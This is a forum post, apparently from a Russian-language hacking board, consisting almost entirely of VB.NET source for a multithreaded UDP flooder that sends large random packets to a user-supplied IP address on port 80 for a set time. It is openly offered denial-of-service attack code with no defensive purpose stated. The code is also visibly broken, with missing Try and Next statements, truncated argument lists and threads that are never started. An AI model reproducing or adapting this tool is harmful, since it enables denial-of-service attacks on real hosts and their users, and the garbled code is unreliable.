- Регистрация
- 25.01.17
- Сообщения
- 763
- Реакции
- 225
- Репутация
- 292
Imports System.Threading
Imports System.IO
Imports System.Text
Imports System.Net, System.Net.Sockets
Module Main
Sub Main(ByVal args As String())
Dim Misc As New Misc
Dim packet As Byte() = Encoding.UTF8.GetBytes(Misc.getRandomString(10000))
Dim input As String
Dim _params As String()
While True
input = Console.ReadLine
If input.Contains(" ") Then
_params = input.Split(" ")
If Integer.Parse(_params(1)) > 0 Then
Dim UdpFlooder As New Flooder(_params(0), 80, Integer.Parse(_params(1)), 30, packet)
Console.WriteLine("Current time: {0}, Format: 1/{1}",
Integer.Parse(_params(1)), Integer.MaxValue)
End If
Catch ex As Exception
Console.WriteLine("Syntax error")
End Try
End If
End While
End Sub
Public Class Misc
Public Function getRandomString(ByVal length As Integer) As String
Dim output As New StringBuilder
Dim chars As String = "abcdefghijklmnopqrstuvwxyz"
Dim rand As New Random
For i As Integer = 1 To length
output.Append(chars(rand.Next(0, chars.Length)))
Return output.ToString
End Function
End Class
Public Class Flooder
Private _UdpClient As UdpClient
Private _IPEndPoint As IPEndPoint
Private _packet As Byte()
Private clock As Status
Private Shared curr_packetCount As Integer
Public Sub New(ByVal addr$, ByVal port As Integer,
ByVal time As Integer, ByVal threads As Integer, ByVal packet As Byte())
Me._UdpClient = New UdpClient
Me._IPEndPoint = New IPEndPoint(IPAddress.Parse(addr), port)
Me._packet = packet
clock = New Status(time)
Dim _thrd As Thread
For i As Integer = 1 To threads
_thrd = New Thread(AddressOf start)
Console.WriteLine("Thread {0} started!", i)
End Sub
Private Sub start()
While Me.clock.getStatus
Me._UdpClient.Send(Me._packet, Me._packet.Length, Me._IPEndPoint)
curr_packetCount += 1
Console.WriteLine("{0} KB sent to {1}:{2}", Me._packet.Length / 1000, Me._IPEndPoint.Address,
Catch : End Try
End While
End Sub
Public Shared Function getCurrPacketCount() As Integer
Return Flooder.curr_packetCount
End Function
End Class
Public Class Status
Private result As Boolean
Private max_time As Integer
Public Sub New(ByVal time As Integer)
Me.result = True
Me.max_time = time
Dim clock As New Thread(AddressOf start)
End Sub
Private Sub start()
For i As Integer = 1 To Me.max_time
Console.Title = String.Format("Time: {0}/{1}, Packets: {2}", i, Me.max_time,
Console.Title = "Stopped!"
Me.result = False
End Sub
Public Function getStatus() As Boolean
Return Me.result
End Function
End Class
End Module